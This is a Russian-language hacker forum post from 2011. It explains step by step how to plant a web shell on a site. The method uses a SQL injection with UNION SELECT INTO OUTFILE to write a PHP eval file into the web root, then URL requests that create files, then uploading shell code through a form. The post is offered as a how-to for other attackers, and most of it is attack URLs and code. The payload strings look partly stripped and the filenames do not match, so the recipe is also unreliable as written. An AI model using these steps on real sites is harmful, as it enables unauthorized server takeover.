19.08.2011, 20:40
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами:
9576027
Репутация:
173
|
|
Помню на одном сайте нельзя было загружать файлы с других сайтов, то есть функцией copy() и подобными нельзя было залить шелл.
Чудил вот такое:
Код:
http://site.com/script.php?id=-1'+union+select+1,2,'',4,5,6,7,8,9,0,11+INTO+OUTFILE+'/var/www/html/eval.php'/*
Код:
http://site.com/eval.php?c=$ff = fopen("down.html","wt"); fwrite($ff,"shell's text"); fclose($ff);
Код:
http://site.com/eval.php?c=$ff = fopen("dshell.php","wt"); fwrite($ff,''); fclose($ff);
Открываем http://site.com/down.html вводим код шелла, нажимаем отправить.
Открываем http://site.com/sheleng.php там и будет наш шелл.
Мог бы просто написать, что отправляем POST запросом код шелла и сохраняем его в файл, но написал с банальными подробностями, думаю вопросы у некоторых отпадут. |
|
|